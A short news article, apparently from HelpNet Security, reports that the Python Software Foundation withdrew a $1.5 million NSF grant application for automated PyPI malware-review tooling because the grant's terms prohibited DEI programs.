Python Foundation Rejects US Security Grant
▼ Summary
– The Python Software Foundation rejected a $1.5 million government grant due to restrictive conditions that conflicted with its mission.
– The grant would have funded automated proactive security tools for Python packages on PyPI to replace the current reactive-only review system.
– The rejected terms would have prohibited the PSF from operating any diversity, equity, and inclusion programs during the grant period.
– The PSF Board unanimously withdrew the application because the DEI restriction directly contradicted their mission to support a diverse programming community.
– The foundation now plans to raise equivalent funding through community donations, sponsorships, and alternative grants.
The Python Software Foundation has declined a substantial $1.5 million grant from the United States government, citing contractual terms that directly conflicted with its core mission and values. In an official statement released Monday, the non-profit organization explained that accepting the funds would have required it to abandon its commitment to diversity, equity, and inclusion initiatives.
Loren Crary, the PSF’s Deputy Executive Director, detailed that the foundation had originally submitted a proposal in January 2025 to the National Science Foundation. The project fell under the Safety, Security, and Privacy of Open Source Ecosystems program. Its primary objective was to develop advanced tools for an automated, proactive review system for all packages uploaded to the Python Package Index (PyPI). This would represent a major shift from the current reactive review model. The planned tools would utilize capability analysis, built upon a dataset of known malware, to identify potential threats before they could cause harm.
Beyond securing the PyPI ecosystem, the outputs from this initiative were designed to be broadly applicable. Other major open source software registries, including NPM and Crates.io, could potentially adopt these security enhancements, thereby strengthening the entire open-source software landscape. A portion of the grant was also intended to support the foundation’s general operational costs.
However, after the proposal was accepted, the PSF was presented with the grant’s specific terms and conditions. These included a clause prohibiting the foundation from operating any programs that “advance or promote DEI” for the entire duration of the financial award. This restriction would have applied to all of the PSF’s activities. Critically, any violation of this term would grant the NSF the right to demand the return of all transferred funds, even if they had already been spent.
Faced with this stipulation, the foundation’s Board of Directors held a unanimous vote to withdraw their application. The decision was rooted in the fundamental conflict between the grant’s conditions and the PSF’s official mission, which is to “promote, protect, and advance the Python programming language, and to support and facilitate the growth of a diverse and international community of Python programmers.”
This is not an isolated case in the tech non-profit world. Earlier this year, The Carpentries, an organization that teaches coding and data science to researchers globally, made an identical choice for precisely the same reason, rejecting a grant with similar restrictive language concerning DEI programs.
Looking forward, the Python Software Foundation is now seeking alternative funding avenues. The organization hopes to raise an equivalent amount, either partially or in full, through direct donations from the programming community, corporate sponsorships, and other grant opportunities that align with its foundational principles.
(Source: HelpNet Security)
